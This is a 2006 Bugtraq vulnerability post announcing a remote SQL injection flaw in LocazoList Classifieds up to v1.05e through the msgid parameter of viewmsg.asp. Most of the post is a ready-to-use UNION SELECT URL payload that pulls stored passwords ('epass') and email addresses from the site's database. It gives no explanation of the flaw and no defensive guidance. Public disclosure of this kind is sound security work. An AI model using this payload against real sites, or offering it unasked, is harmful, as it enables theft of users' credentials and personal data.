
Date: 3 Jun 2006 10:45:00 -0000
From: ajannhwt@...mail.com
To: bugtraq@...urityfocus.com
Subject: LocazoList Classifieds <= v1.05e(viewmsg.asp) Remote SQL
 Injection Vulnerability


# Title  :   LocazoList Classifieds <= v1.05e(viewmsg.asp) Remote SQL Injection Vulnerability
# Author :   ajann

#Vulnerability;

$$$ http://[target]/[path]/viewmsg.asp?msgid= SQL TEXT

$$$ Example:

http://[target]/[path]/viewmsg.asp?msgid=-1%20union%20select%20epass,0,0,0,email,0,0,0,0,0,0,0,0,0,0%20from%20thing+where+msgid=X

Msgid= TopicID


